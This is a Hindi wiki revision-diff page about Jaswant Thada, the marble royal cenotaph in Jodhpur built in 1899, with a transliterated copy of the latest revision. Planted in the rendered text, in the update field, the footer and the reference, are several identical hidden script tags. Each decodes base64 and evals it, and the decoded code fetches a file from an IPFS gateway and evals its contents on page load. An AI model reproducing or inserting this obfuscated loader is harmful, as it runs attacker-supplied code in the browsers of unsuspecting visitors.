Difference between revisions of "जसवंत थाड़ा जोधपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 2: Line 2:
 
|चित्र=Jaswant-Thada-Jodhpur-3.jpg
 
|चित्र=Jaswant-Thada-Jodhpur-3.jpg
 
|चित्र का नाम=जसवंत थाड़ा, जोधपुर
 
|चित्र का नाम=जसवंत थाड़ा, जोधपुर
|विवरण=[[जोधपुर]] स्थित जसवंत थाड़ा पूरी तरह संगमरमर से निर्मित भवन है।  
+
|विवरण='जसवंत थाड़ा' [[राजस्थान]] के [[जोधपुर]] में स्थित संगमरमर से निर्मित भवन है। यह स्थान जोधपुर राजपरिवार के सदस्यों के [[दाह संस्कार]] के लिये सुरक्षित है।
 
|राज्य=[[राजस्थान]]
 
|राज्य=[[राजस्थान]]
 
|केन्द्र शासित प्रदेश=
 
|केन्द्र शासित प्रदेश=
 
|ज़िला=[[जोधपुर ज़िला|जोधपुर]]
 
|ज़िला=[[जोधपुर ज़िला|जोधपुर]]
|निर्माता=सरदार सिंह
+
|निर्माता=महाराजा सरदार सिंह
 
|स्वामित्व=
 
|स्वामित्व=
 
|प्रबंधक=
 
|प्रबंधक=
|निर्माण काल=
+
|निर्माण काल=1899
|स्थापना=1899
+
|स्थापना=
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=26.303889,73.025278&ll=26.306303,73.025265&spn=0.017697,0.042272&t=m&z=15&vpsrc=6&iwloc=near उत्तर- 26° 18' 14.00", पूर्व- 73° 1' 31.00"]
+
|भौगोलिक स्थिति=
|मार्ग स्थिति=जसवंत थाड़ा [[जोधपुर]] राष्ट्रीय राजमार्ग संख्या 65 से 7.7 किमी की दूरी पर स्थित है।
+
|मार्ग स्थिति=जसवंत थाड़ा राष्ट्रीय राजमार्ग संख्या 65 से 7.7 कि.मी. की दूरी पर स्थित है।
 
|मौसम=
 
|मौसम=
 
|तापमान=
 
|तापमान=
 
|प्रसिद्धि=
 
|प्रसिद्धि=
 
|कब जाएँ=
 
|कब जाएँ=
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि
+
|कैसे पहुँचें=
 
|हवाई अड्डा=जोधपुर हवाई अड्डा  
 
|हवाई अड्डा=जोधपुर हवाई अड्डा  
 
|रेलवे स्टेशन=जोधपुर रेलवे स्टेशन  
 
|रेलवे स्टेशन=जोधपुर रेलवे स्टेशन  
Line 26: Line 26:
 
|क्या खायें=
 
|क्या खायें=
 
|क्या ख़रीदें=
 
|क्या ख़रीदें=
|एस.टी.डी. कोड=0291
+
|एस.टी.डी. कोड=
|ए.टी.एम=लगभग सभी
+
|ए.टी.एम=
 
|सावधानी=
 
|सावधानी=
|मानचित्र लिंक=[http://maps.google.com/maps?saddr=Jodhpur,+Rajasthan,+India&daddr=Jaswant+Thada+Jodhpur,+Rajasthan,+India&hl=en&ll=26.280948,73.018055&spn=0.070802,0.169086&sll=26.290645,73.01857&sspn=0.070796,0.169086&geocode=FVmlkAEd1CZaBCm5zAaqToxBOTG4q-EKW-oUgQ%3BFW5dkQEdJ0ZaBCF4FXqdvWGPLQ&vpsrc=0&mra=ls&t=m&z=13 गूगल मानचित्र]
+
|मानचित्र लिंक=
|संबंधित लेख=[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], [[उम्मेद महल जोधपुर|उम्मेद महल]]
+
|संबंधित लेख=[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], [[उम्मेद महल जोधपुर|उम्मेद महल]], [[राजस्थान पर्यटन]]
 
|शीर्षक 1=
 
|शीर्षक 1=
 
|पाठ 1=
 
|पाठ 1=
Line 37: Line 37:
 
|अन्य जानकारी=
 
|अन्य जानकारी=
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|13:20, 7 नवम्बर 2011 (IST)}}
+
|अद्यतन={{अद्यतन|02:39, 19 जनवरी 2017 (IST)}}
 
}}
 
}}
 +
'''जसवंत थड़ा''' ([[अंग्रेज़ी]]: ''Jaswant Thada'') [[राजस्थान]] के प्रसिद्ध पर्यटन स्थलों में गिना जाता है। यह [[मेहरानगढ़ क़िला|जोधपुर दुर्ग, मेहरानगढ़]] के पास ही सफ़ेद संगमरमर से बना हुआ एक स्मारक है। यह स्थान [[जोधपुर]] राजपरिवार के सदस्यों के [[दाह संस्कार]] के लिये सुरक्षित रखा गया है।<ref>{{cite web |url=http://www.metromirror.com/rajasthan_h/showarticle_raj_h.php?article=rajtourism_h |title=राजस्थान पर्यटन |accessmonthday=19 जनवरी |accessyear=2017 |last= |first= |authorlink= |format= |publisher=metromirror.com |language= हिंदी}}</ref>
  
'''जसवंत थाड़ा''' [[राजस्थान]] राज्य के [[जोधपुर]] शहर में स्थित एक भवन है।
+
*सन [[1899]] में [[जोधपुर]] के महाराजा जसवंत सिंह द्वितीय (1888-1895) की याद में उनके उत्तराधिकारी महाराजा सरदार सिंह ने इसे बनवाया था।
*जसवंत थाड़ा पूरी तरह संगमरमर से निर्मित है।  
+
*यह स्थान जोधपुर राजपरिवार के सदस्यों के दाह संस्कार के लिये सुरक्षित है। इससे पहले राजपरिवार के सदस्यों का दाह संस्कार मंडोर में हुआ करता था।
*इसका निर्माण 1899 में सरदार सिंह ने राजा [[जसवंत सिंह द्वितीय]] और उनके सैनिकों की याद में कराया था।  
+
*इस विशाल स्मारक में संगमरमर की कुछ ऐसी शिलाएँ भी दिवारों में लगी हैं, जिनमें [[सूर्य]] की किरणें आर-पार जाती हैं।
*इसकी कलाकृति आज भी पर्यटकों को अपनी ओर आकर्षित करता है।
+
*इस स्मारक के लिये जोधपुर से 250 कि.मी. दूर मकराना से संगमरमर का पत्थर लाया गया था।
 
+
*स्मारक के पास ही एक छोटी-सी [[झील]] है, जो स्मारक के सौंदर्य को और बबढ़ा देती है। इस झील का निर्माण महाराजा अभय सिंह (1724-1749 ई.) ने करवाया था।
 
+
*जसवंत थड़ा के पास ही महाराजा सुमेर सिह, महाराजा सरदार सिंह, महाराजा उम्मेद सिंह व महाराजा हनवन्त सिंह के स्मारक बने हुए हैं।
{{लेख प्रगति
+
*इस स्मारक को बनाने में 2,84,678 रुपए का खर्च आया था।
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 +
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
Line 64: Line 60:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:जोधपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:जोधपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]
[[Category:जोधपुर]]__INDEX__
+
[[Category:जोधपुर]]
 +
__INDEX__

Latest revision as of 09:09, 19 January 2017

jasavant tha da jodhapur
vivaran 'jasavant tha da' rajasthan ke jodhapur mean sthit sangamaramar se nirmit bhavan hai. yah sthan jodhapur rajaparivar ke sadasyoan ke dah sanskar ke liye surakshit hai.
rajy rajasthan
zila jodhapur
nirmata maharaja saradar sianh
nirman kal 1899
marg sthiti jasavant tha da rashtriy rajamarg sankhya 65 se 7.7 ki.mi. ki doori par sthit hai.
havaee adda jodhapur havaee adda
relave steshan jodhapur relave steshan
bas adda bas adda jodhapur
yatayat sthaniy bas, aauto riksha, saeekil riksha
kahaan thaharean hotal, dharmashala, atithi grah
sanbandhit lekh meharanagadh qila, ummed mahal, rajasthan paryatan


adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jasavant th da (aangrezi: Jaswant Thada) rajasthan ke prasiddh paryatan sthaloan mean gina jata hai. yah jodhapur durg, meharanagadh ke pas hi safed sangamaramar se bana hua ek smarak hai. yah sthan jodhapur rajaparivar ke sadasyoan ke dah sanskar ke liye surakshit rakha gaya hai.[1]

  • san 1899 mean jodhapur ke maharaja jasavant sianh dvitiy (1888-1895) ki yad mean unake uttaradhikari maharaja saradar sianh ne ise banavaya tha.
  • yah sthan jodhapur rajaparivar ke sadasyoan ke dah sanskar ke liye surakshit hai. isase pahale rajaparivar ke sadasyoan ka dah sanskar mandor mean hua karata tha.
  • is vishal smarak mean sangamaramar ki kuchh aisi shilaean bhi divaroan mean lagi haian, jinamean soory ki kiranean ar-par jati haian.
  • is smarak ke liye jodhapur se 250 ki.mi. door makarana se sangamaramar ka patthar laya gaya tha.
  • smarak ke pas hi ek chhoti-si jhil hai, jo smarak ke sauandary ko aur babadha deti hai. is jhil ka nirman maharaja abhay sianh (1724-1749 ee.) ne karavaya tha.
  • jasavant th da ke pas hi maharaja sumer sih, maharaja saradar sianh, maharaja ummed sianh v maharaja hanavant sianh ke smarak bane hue haian.
  • is smarak ko banane mean 2,84,678 rupe ka kharch aya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. rajasthan paryatan (hiandi) metromirror.com. abhigaman tithi: 19 janavari, 2017.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>